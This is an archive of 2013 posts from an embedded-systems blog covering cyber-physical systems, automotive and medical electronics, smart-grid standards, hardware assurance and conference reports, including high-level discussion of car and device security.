Thursday, December 26, 2013

Embedded Systems Channel on YouTube

I have started to record videos for my book Computers as Components. You can find these videos on my new YouTube channel.  Click on this link or search for "Marilyn Wolf embedded" to get there.  The videos make use of the PowerPoint you can find on the book Web site but these videos are arranged into short, 5-10 minute chunks that focus on one or two topics. I have put together playlists on topics to help organize the videos. I will need a few months to fill out the videos for the entire book, so stay tuned!

Thursday, December 19, 2013

Credit Card Swiper Attack

News sources, including CNN's story here, are reporting that a vast amount of credit card data has been stolen from Target's customers. It appears that the card swipers were hacked to grab data from the customers' cards.

Monday, December 16, 2013

Big Signals

Big Data is a popular buzzword in computer science and with good reason.  The analysis of large data sets is both a difficult problem and one with a wide range of applications; the selection of ads for blogs based on their content and the user's activity is just one example.

But traditional Big Data systems, like Google Cloud, are designed for more traditional database applications.  They aren't built to handle time-oriented data.  Cyber-physical systems use time as a fundamental concept.  Time-series data and signals are two terms for this concept.

Of course, entire fields (e.g., signal processing) have sprung up to develop the mathematics of signal processing.  But the design of large computing systems that can efficiently handle time-series data has lagged behind.

That's where Big Signals comes in.  We need cloud computing systems that are designed to manage signals and time-series data.  We process signals in a different way than we do, for example, sales transactions. Cloud systems that operate on signal-oriented data will want to process small windows of signals in real time to identify important events; they will also want to analyze historical data at multiple time scales in order to identify larger trends. 

Here are a few examples of how to use Big Signals in the cloud.  Farmers may use historical weather data to figure out how to plant, water, and feed their crops.  Medical teams may use cloud-based systems both to monitor a patient's current state as well as to run longer-term analyses for diagnosis. Energy systems may use historical load data to manage energy generation; it can also use historical weather data to predict the generation capacity available from wind and solar.

The existing cloud computing systems are a good start, but we need to understand how data schema, access scheduling, and other problems to handle the challenges of Big Signals.

Sunday, December 15, 2013

CPS in the Clouds

Cloud computing for cyber-physical systems is in vogue; see, for example, this NSF-sponsored workshop on the topic. The idea behind cloud CPS is much the same as for information technology---move some important operations to remote server farms.  This idea leverages both efficient servers and ubiquitous Internet.

However, the technical challenges behind cloud CPS are different and arguably harder than those for database-oriented operations.  Control systems have deadlines.  If your control system is in the clouds, then each control sample has to perform its complete round trip: to the cloud server through the Internet,  computing in the cloud, then back to the physical plant. The basic physics of communication mean that we won't be able to put very high rate, low latency control loops in the cloud.  Bandwidth isn't the only requirement---latency is ultimately determined by the speed of light.  But there are a lot of control loops that are slow enough to allow them to be put in the clouds.  Many hierarchical control systems have some very fast control loops and supervisory control that runs much more slowly. My favorite example is traffic control.  The decisions required to time the lights could be performed in the cloud; rather than have each city buy and maintain its own traffic flow system, all cities could share a more sophisticated control system located in the cloud.

People often assume that cost savings is the primary motivation for putting cyber-physical systems in the cloud.  In fact, reliability is an even greater motivation.  Designing a highly-available server farm is a challenging task.  A typical large server farm consumes the electricity of a city of 50,000 people, but it crams all that energy into a space the size of a large conference room.  All the heat that is generated by those computers makes for a very challenging heat transfer problem.  Not only does the heat cost money to eliminate with cooling systems, it's a major source of failures as components overheat.


If you run a safety-critical, high-reliability cyber-physical system, you should seriously think about putting your SCADA (supervisory control) system in the cloud, preferably run by someone who does it full time.  The challenge of running a highly-reliable server system is big enough that it shouldn't be left to amateurs.

Saturday, December 7, 2013

Medical Cyber-Physical Systems

We have had medical electronics devices for several decades and they have made a huge difference in medical care.  A nurse once explained to me how he used to set up a drip for a patient.  It required a lot of manual tweaking of the tubes and drip rate.  And this was in the 1970's, not so long ago.  Continuous monitoring instruments have also made a huge difference in patient care.

We are in the midst of a new round of medical device innovation.  This time, innovation emphasizes systems.  Networked devices have existed for awhile but largely with proprietary interfaces.  The push to digitize and integrate medical records into a unified system is leading manufacturers toward an increasingly cyber-physical approach to medical device design.

Several proposals have been developed for the integration of medical devices, including MDPnP, the Medical Device Coordination Framework, and the  University of Pennsylvania  Medical Application Platform (MAP) architecture.  Several common themes emerge from these efforts: frameworks that support closed-loop design; safety of the system operation even when individual devices fail; and the need to provide quality-of-service (QoS) guarantees for real-time data.

Patient records have become much more integrated and accessible to a broader range of medical personnel.  A decade ago, a lot of hospitals moved records on paper from one part of the hospital to another---none of their data was digitized.  As doctors learn to use these integrated systems, we can expect that they will find new applications that require new capabilities.

Monday, December 2, 2013

Thoughts on Embedded Computer Vision

The embedded computer vision space seems to be heating up.  The OpenCV platform has been used to develop computer vision applications on workstations and is increasingly used for embedded platforms as well.  The new OpenVX standard provides a high-level, platform-independent interface to OpenCV functions.

What markets need computer vision? Digital cameras use quite a few vision functions---for example, face detection is used for focus and exposure compensation.  Surveillance systems use computer vision to alert system operators to important events.  Cars use cameras to both analyze the scene outside of the car (looking for pedestrians, lane following, etc.) and inside the car (driver monitoring, for example).  Gesture control systems are now commonplace in video gaming systems and are poised to move into other types of products as well.

Sunday, December 1, 2013

Big, Embedded Software

I just found this interesting article in Aviation Week on the software for the 787.  The problem they describe seems to center on requirements: the avionics software sends too many alerts.  Because this plane is much more heavily instrumented, it has a lot of data at its disposal.  I suspect that the designers didn't think to write requirements specifically about the sensitivity of the alert system: how many alerts per hour, etc.  The traditional focus in the design of such systems is on ensuring that a particular alert is generated.  But as we move to more heavily instrumented systems across the board, we need to think more systematically about what we do with all that sensor data.  We are instrumenting not just airplanes, but buildings, factories, and roadways.   The analysis tools for all these systems must balance two tasks: making sure that important alerts are delivered quickly to the appropriate authority; and ensuring that events are accurately tagged with the appropriate level of alert.   A well-known phenomena of alert-based systems is that too many false alarms cause human operators to disregard all alerts.  We won't get people completely out of the loop for quite some time.  Even if we do manage to build totally autonomous systems, they will face the same problem of properly discriminating between important and unimportant events.

Saturday, November 16, 2013

Standards for Embedded Computing Design

Here is a list of standards for embedded computing system design.  I will continue to add to this list.

  • AUTOSAR: operating system and software configuration.
  • MISRA C: coding standards for C in automotive systems.
  • ISO 26262: safety for automotive E/E.
  • NIST 7628: smart grid security.
  • SAE AS5553A: hardware authentication.
  • ARINC: ARINC standards for airplane design: 400 series for basic wiring; 500 series for analog instruments; 600 series for digital communications; 700 series for digital instruments; 800 series for networked aircraft.
  • ASTM F2761: Standard for the Integrated Clinical Environment (ICE) for networked medical devices.
  • DO-178C:  Standard for the certification of software in avionics.

Tuesday, November 12, 2013

Automotive Software

Toyota just settled a big case relating to its cars.  Here are two interesting blog posts with some details as well as the authors' opinions:

http://www.safetyresearch.net/2013/11/07/toyota-unintended-acceleration-and-the-big-bowl-of-spaghetti-code/


http://criticaluncertainties.com/2013/11/11/toyota-and-the-sphagetti-monster/

My big picture observation on this situation is that design methodology is very important. A bad design process is bound to produce poor designs.  And as the saying goes, you have to bake in safety, you can't bolt it on.  No amount of checking can make a bad design safe.

Thursday, November 7, 2013

NIST Smart Grid Cybersecurity Guidelines

NIST has released a draft set of guidelines for smart grid cyber security which you can find here.  It's a big, three volume document and I have just started to read it.

Volume 1 concentrates on development, architecture, and high-level requirements.  It first presents a logical architecture of the smart grid, at least for the 1-3 year time frame and its major components; based on that architecture it identifies 22 logical interface categories.  It then specifies security requirements for each of the 22 interface categories.  It then goes onto describe cryptographic and key management issues.

Volume 2 concentrates on privacy.  Privacy is a key issue because the information that the smart grid uses to optimize energy usage can also divulge other properties that a customer or energy provider may not want to provide: how they use their facilities, when they are home, etc.

Volume 3 provides some additional analysies.  It talks about classes of vulnerabilities, provides a bottom-up security analysis of the smart grid, and identifies research and development themes for smart grid cyber security.  It also provides use cases for the power system relevant to security requirements.

Thursday, October 31, 2013

GridSTAR Opening

I just returned from the grand opening of the GridSTAR center at the Philadelphia Navy Yard. This center was created by Penn State and the Department of Energy as a combined education and research center for smart energy grids.  Their first demonstration is this model home.  It both demonstrates a number of smart grid technologies as well as providing a training center for people to develop the skills required to work on these new systems.  The smart home includes three buildings.  The house itself demonstrates systems ranging from solar panels to radiant heat.  The learning center in back has a number of electrical systems installed inside that can be used for training.  The third building contains an energy storage system that is hooked into the Navy Yard grid.

They also showed cool systems  like this solar-powered electric car charger...

and this electric motorcycle.

Over the longer term, GridSTAR will use the entire Navy Yard as a testbed for smart energy technologies.  Given the wide range of businesses there, ranging from a major shipbuilder to the headquarters of Urban Outfitters, the Navy Yard should be a great place to develop new smart enertg grid solutions.

Thursday, October 24, 2013

Farewell, Cyber-Physical Sewing Machine!


I am retiring one of my cyber-physical machines---my sewing machine, to be precise.  You can see the source of the problem in the photo, namely the ribbon cable to the front panel.  The front panel is attached to the body with a very small tongue and a little adhesive.  When it comes loose, it pulls the cable out of its connector.  This little four-bit microcontroller costs $120 to replace; I know because it has happened before.

I have replaced it with an old-fashioned mechanical sewing machine, one built by Toyota, no less.  It has metal gears and no computer.  Toyota, of course, has had its own problems with cyber-physical systems, but I am confident that they know how to make a reliable gearbox.

While we are on the subject of sewing machines, let's take a minute to consider the genius of the sewing machine and its inventor, Elias Howe. The mechanism of the sewing machine performs a fiendishly complicated motion to perform what seems to be impossible---it wraps one thread around another.  Since Mr. Howe worked before the midpoint of the 19th century, he had no computers to control his machine.  He relied on simple rotating machines and cleverness.  150 years later, we still use his work.  As we design complex cyber-physical machines, let's remember that our goal should be to create designs that last.

Sunday, October 20, 2013

Car Electronics: E/E

I've found a term I hadn't heard before: E/E.  It refers to the electrical/electronic architecture of a car.  Automotive has never had a term like avionics for airplanes, so this term is really past due and welcome.

One of the elements of E/E that has been around for awhile now is AUTOSAR, or Automotive Open Systems Architecture.  It is a standard that concentrates on engine control units. The OSEK OS, an ISO standard (ISO 17356-3) is the foundation for the specification of the operating system; it specifies the interfaces to the task-oriented functions of the OS.  AUTOSAR also specifies an AUTOSAR Runtime Environment that provides middleware functions for the applications.  A Microcontroller Abstraction Layer (MCAL) abstracts the microcontroller's hardware to provide a standard interface for functions such as I/O and flash.  AUTOSAR also includes a methodology for configuring an AUTOSAR-compliant system from its components.

Sunday, October 13, 2013

Hardware Assurance

The term hardware assurance has been circulating for the past couple of years.  This term refers to assurance that the hardware you have is the hardware you think you paid for.  Counterfeit electronic hardware has become a big problem for the military---they pay big money for equipment that turns out to be fraudulent and non-functional.  Companies are increasingly concerned about the effects of counterfeit hardware on their bottom line---not only do they lose the sale to the counterfeit, but they often have to pick up the warranty costs for those counterfeits, too.

At the most basic level, hardware assurance ensures that components have not been substituted.  One way to provide such assurance is through supply chain management: auditing, custody chain tracking, etc. SAE has developed a standard, AS5553A, for the documentation and procedures to be followed to ensure a reliable supply of components from suppliers.  That standard, of course, needs to be followed not just by your supplier but by their suppliers as well.

Programmable memories are, of course, an easy way to attack programmable devices.  Andrew Appel of Princeton University has demonstrated the ease with which ROMs on New Jersey's voting machines can be substituted, allowing the voting machine to be reprogrammed.

A more subtle version of this problem rears its head in the semiconductor world.   If you give a set of masks to a semiconductor manufacturer, how do you know that they manufactured the circuit you gave them?  Not only may they have manufactured junk, but they may have introduced Trojan horses into your hardware that they can exploit at later dates.  Various techniques have been developed to deal with this problem.  Netlists can be used as watermarks to verify that the design has not been changed.

Yet another subtlety comes into play for embedded devices---how do you know that a device in the field hasn't been swapped?  Even if a device leaves your plant with the correct hardware, it may have been compromised after installation. Physically unclonable functions (PUFs) can be used to generate a unique signature for each device that can be checked in the field.

Sunday, October 6, 2013

Thermal-Aware Computing

Temperature has reared its head as an important issue.  And it's not just a challenge for server farms.  All types of embedded devices must be designed to meet thermal-related design specifications.

Thermal behavior affects system operation in several ways.  Heat generation causes problems for the environment in which the device operates.  In machine rooms, we want to pack as many CPU and disk drives into the room as possible; perhaps even more important, we don't want to spend any more money than we have to cooling the room.  Thus, the simple quantity of energy transferred into the room from the processor is a big issue in machine rooms.  Machine room designers also have to worry about how air circulates.   Poor air circulation leads to hot spots that cause devices to fail.

Excess temperatures also lead to catastrophic component failure.  And I don't use the word catastrophic lightly.  Search for "overheating pentium" on youtube to find a variety of videos that show CPUs running so hot that they start to smoke.  These failures are so catastrophic because they are the result of positive feedback: high temperatures increase leakage currents; high leakage currents increase temperature.

In consumer electronics, the traditional goal for temperature management has been to avoid fans. A fan, even a well-designed one, creates some amount of background noise that is particularly undesirable in multimedia applications.  Of course, a fan on a cell phone is just plain ridiculous.  Today's cell phones can get pretty darn warm to the touch if you run a data-intensive application for a few minutes.

But temperature has a more subtle effect on system lifetime.  A CPU doesn't have to catch fire to be damaged.  Chips can fail in all sorts of ways: dopants rediffuse, oxides break down, wires break down.  Most of these failure mechanisms are temperature-dependent and can be an exponential function of temperature.  The hotter you run, the shorter your lifetime. Running just under the maximum temperature for your device doesn't avoid trouble.

Tuesday, October 1, 2013

Embedded Systems Week: Mixed-Criticality and Model-Based Design

Today at Embedded Systems Week, I attended the special session on mixed-criticality systems.  This is a relatively new formulation of real-time systems in which tasks are grouped into levels of criticality.  Tasks in the higher levels of criticality are given priority over lower-criticality tasks when resource constraints arise. As we put more and more functions into systems, we need to understand how to manage criticality.  Imagine, for instance, the electronic systems in your car.  The engine controller and radio both run on the same computing platform, but we want to be sure that the engine controller is viewed by the system as more critical than the radio.  The panelists did a good job of explaining the importance of the problem, what progress we have made on mixed-criticality in a few short years, and what we still need to do.

I also attended the special session on model-based design.  The panel considered efforts to take the next-step from models as documents and tools to models as the only artifacts used for complex system design.  The panelists walked us through an example model-based design, including verifying a simple specification.  They also talked about the complexities of using models for real-world system.  Given the huge number of different modeling languages in use, each with its own advantages, it is unlikely that we will ever have a single, unified modeling language for all systems.  The panelists instead advocated using a collection of application-specific languages tied together with tools that cross-check properties of the individual models.

Embedded Systems Week: Systems Engineering and Run-Time Adaptation

Monday's keynote at Embedded Systems Week came from Clas Jacobson, Chief Scientist at United Technologies Systems and Controls Engineering.  UTC designs a lot of complex cyber-physical systems, including elevators, car subsystems, and jet engines.  Dr. Jacobson identified three As as important in CPS design: architecture, abstractions, and automation.  He stressed the importance of good modeling as the foundation of robust system design.

I also attended a session on run-time adaptation with presentations by Joerg Henkel, Vijay Narayanan, Sri Parameswaran, and Juergen Teich.  Determining all aspects of system operation at design time simply doesn't work for today's complex systems.  The computation required depends on the input data---image/video compression is a classic example of a complex relationship between image/video data and compression time.  The complexities of thermal management are also best handled in many cases with run-time systems.  The talks gave a multi-level view of the problem.  Joerg's talk concentrated on thermal, including  a cool infrared video of chip temperature over time.  Vijay's talk looked at the opportunities presented by tunneling transistors, which provide good off characteristics but are slower than traditional MOSFETs.  Sri's talk looked at video compression and how to manage the complex pipeline required to perform all the steps required for compression.  Juergen's talk described a new model of computaiton for run-time management known as invasive computing.

Sunday, September 29, 2013

Embedded Systems Week: Security Workshop

I'm at Embedded Systems Week, the major research conference for embedded computing.  Today, I attended the Embedded Systems Security Workshop.  The speakers presented some very interesting results.  But let me concentrate on the keynote by Wayne Burleson of the University of Massachusetts, who spoke on privacy in embedded computing.

He made the very interesting point that trust and security are not the same thing; we don't understand as much about trust as we do about security.  We have identified quite a few threat models in traditional computer security.  The same cannot be said for privacy.  It isn't always clear from whom the threat comes from or what constitutes an invasion of privacy.  Some releases of personal information are  natural, intended, and necessary; some breaches are unnecessary but not particularly consequential; while others can have devastating consequences.  Unfortunately, if we don't understand the threat models, we can't do much to mitigate those threats.

He described two of his projects.  The first developed new techniques for electronic fare payment for transportation systems.  He and his colleagues developed a form of electronic cash that allows the user to pay for a fare and obtain special fares such as senior citizen fares without disclosing other information about themselves.

He then talked about his work on medical system privacy.  The medical community is busy developing all sorts of implanted medical devices that can transmit information about the state of your body to your doctor.  The trick is to be sure that only intended people have access to that information.  Medical devices operate under severe energy constraints, on the order of 10 joules per operation, so any security and privacy techniques employed in the device must be able to be performed at these very low energy levels.  Burleson also pointed out that the risk/benefit analysis in medical devices must be carefully performed.  For example, hacks on pacemakers were revealed a few years ago.  The manufacturers very quickly addressed the problems because of concerns that patients would decide not to have a pacemaker in order to avoid being hacked.  Of course, the risk of dying from lack of a pacemaker is much, much higher than is the risk of having your pacemaker hacked into, but there is no point in taking chances with such analysis.

Wednesday, September 11, 2013

Car Hacking

The common conception of security problems in cars is theft---someone breaks into your car electronically and drives away with it. The security challenges created by the computers that control your car go far beyond that scenario.  Modern cars are cyber-physical systems with dozens of computers that control safety-critical functions.  All sorts of security problems can cause cars to fail catastrophically---that is, crash.

One important category of vulnerabilities in cars is timing.  If someone messes up the timing of the firing of the spark plugs and fuel injectors in your engine, the engine stops working.  Timing problems in the braking system can cause you to lose control of steering.

How do timing problems occur?  Some of the scenarios are localized.  The engine control unit (ECU) is in charge of sending out all the signals to control the engine.  Problems in the ECU software can cause it to improperly time some of the signals to the engine.  The effects can range from running rough to total engine failure.

But the computers in your car are connected together on a network.  Just as the Internet created new types of security problems for home and business computers, car networks create new vulnerabilities for cars.  Units in the car communicate with each other over the network in real time to coordinate their activities.  Interfere with their ability to communicate and the car itself stops working properly.

The CAN bus has been used in cars for years.  Unfortunately, it is vulnerable to all sorts of timing problems.  For example, one component on the CAN bus can jam the network by sending out too many messages.  The simplicity of the CAN bus means that there is no global control that can monitor and react to these sorts of problems.

The Flexray bus has been designed to avoid many of these problems.  It's starting to appear in cars.  Flexray has some very sophisticated mechanisms.  Time will tell how well they solve old problems and if they create new challenges.

Sunday, September 8, 2013

The Maker Revolution and the Embedded World

The Maker movement has reinvigorated my faith in humanity.  I had become increasingly worried that people---both kids and adults---had stopped making things. So many traditional hobbies---model airplanes, plastic models, ham radio---have shriveled.  Working on cars used to be an American passsion; John Steinbeck included an ode to the mechanic as a chapter in The Grapes of Wrath. Today, cars are designed so that amateur car maintenance is very difficult.

Today, we have turned the corner and see people building all sorts of new things in all sorts of ways.  A few key product innovations have helped enable this revolution. Lego Mindstorms certainly introduced a lot of kids to robotics.  3D printers, which were exotic and expensive just a few years ago, have been democratized to the point of becoming household items.

But I am a little surprised that we don't see more integration of the mechanical and computer sides of Makerdom. Sure, we see computers controlling things, but that control is very, very simple.  Concurrency is fundamental to embedded computing.  Computers allow our machines to do several things at once.  But most of the toys I see do one thing at a time, roughly speaking.  Robots perform one operation, then stop and do something else.

Concurrency is, of course, not easy to achieve.  But it is cool.  I hope that we can figure out ways to make concurrency simpler and usable by hobbyists.  That will require new programming models that make it easy to describe concurrency.  We've made some progress on that front for high-end system designers, but those high-level programming languages are too complex to use..  I suspect that a hobbyist-friendly concurrent embedded programming language would be useful not just for high school kids but ultimately to a wide range of professional system designers.

Tuesday, September 3, 2013

Toilet Hacking

The press recently caught onto the fact that real-world objects, not just computers, can be hacked.  This CNN story on the hacking demonstrations, such as hacking a fancy Japanese toilet, at Def Con and Black Hat is one example, but there are others.  Of course, your toilet can't be hacked if it doesn't have a computer in it.  I've used those fancy Japanese toilets and I find them a little scary, so I'm glad that I don't have one at home.  But this sort of hacking has been a hidden problem for a long time and I am glad that it is coming out into the open.


A lot of the recent stories have been about objects that I would call Internet of Things simply because they perform common functions but are also clearly connected to the Internet.  But a lot of things we don't think about in our daily lives are also connected to the Internet.  Many of us don't have a traditional phone line (what the Bell System used to call POTS, or Plain Old Telephone Service); we instead rely on telephones that are built on top of the Internet.  Quite a few industrial systems are now connected to the Internet.  These network connections provide useful functions but they also open up serious vulnerabilities. 
<p>So long as we understand the security implications of those systems and take care of them properly, things will continue to run along smoothly.  But with great power comes great responsibility, and as the Internet of Things grows we need to be sure to manage it responsibly.  If we don't, all those devices could start to bite us on the fanny.